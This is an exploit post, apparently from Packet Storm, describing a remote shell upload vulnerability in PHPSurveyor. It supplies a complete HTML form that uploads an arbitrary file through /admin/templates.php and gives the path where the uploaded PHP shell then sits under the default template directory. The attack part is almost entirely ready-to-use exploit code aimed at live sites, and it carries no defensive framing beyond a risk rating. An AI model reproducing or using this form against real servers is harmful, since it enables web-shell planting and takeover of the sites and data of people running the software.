PHPSurveyor suffers from a remote shell upload vulnerability.
1ae2be6659eceab6f2fe08517e7d5ee0c444690d71d791f904fc264c5ccdc978##################################################
################-=[ G4eL ]=-######################
##################################################
Exploit Title: PHPSurveyor - Shell Upload Exploit
Author: G4eL
Date: 26/12/2013
Product: PHPSurveyor
Official Site: http://www.limesurvey.org/
Risk Level: High
#################################################
#################################################
/admin/templates.php - File Upload
[URL SITE] = Default directory of PHPSurveyor
Example : http://site.com/survey/
<form enctype='multipart/form-data' name='importsurvey' action='[URL SITE]/admin/templates.php' method='post'>
<input class='btstyle' name="the_file" type="file" size="7">
<input type='submit' value='Upload' class='btstyle' disabled>
<input type='hidden' name='editfile' value=''>
<input type='hidden' name='screenname' value=''>
<input type='hidden' name='templatename' value='default'>
<input type='hidden' name='action' value='upload'>
</form>
File Uploaded in templates "default"!
Example: http://site.com/survey/templates/default/G4eL.php
"/templates/name of template/name of your file"
#################################################
#################-=[ Contact ]=-#################
2403342020@qq.com (Email)
live:s3cur3 (Skype)
#################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed